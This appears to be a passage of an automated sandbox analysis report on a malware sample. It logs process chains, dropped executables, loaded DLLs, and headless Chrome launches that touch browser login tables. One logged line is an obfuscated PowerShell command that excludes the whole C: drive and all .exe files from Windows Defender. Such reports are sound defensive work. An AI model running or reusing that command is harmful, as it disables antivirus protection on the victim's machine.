                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeMutant created: \Sessions\1\BaseNamedObjects\15e3cb7667a15b0c6fe65713f09036f8
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMutant created: \Sessions\1\BaseNamedObjects\kdbaf
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1l2zyuj.o2o.ps1Jump to behavior
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\AppData\Roaming\a.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\a.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\a.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: chrome.exe, 0000000C.00000002.1508785015.0000021F24680000.00000002.00000001.00040000.0000001B.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                      Source: chrome.exe, 0000000C.00000002.1507739912.0000021F242E5000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeVirustotal: Detection: 16%
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe"
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" --no-pre-read-main-dll --field-trial-handle=2336,i,9433496215065290315,15168576315404753794,262144 --variations-seed-version --mojo-platform-channel-handle=2416 /prefetch:3
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\license.exe "C:\Users\user\AppData\Roaming\license.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess created: C:\Users\user\AppData\Roaming\license.exe "C:\Users\user\AppData\Roaming\license.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\hosts.exe "C:\Users\user\AppData\Roaming\hosts.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi\Crashpad --metrics-dir=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=134.0.6998.36 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffc9d1d4f38,0x7ffc9d1d4f44,0x7ffc9d1d4f50
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2336,i,9433496215065290315,15168576315404753794,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:2
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" --no-pre-read-main-dll --field-trial-handle=2336,i,9433496215065290315,15168576315404753794,262144 --variations-seed-version --mojo-platform-channel-handle=2416 /prefetch:3
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\AppData\Roaming\license.exe "C:\Users\user\AppData\Roaming\license.exe"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeProcess created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeProcess created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Roaming\license.exeProcess created: C:\Users\user\AppData\Roaming\license.exe "C:\Users\user\AppData\Roaming\license.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
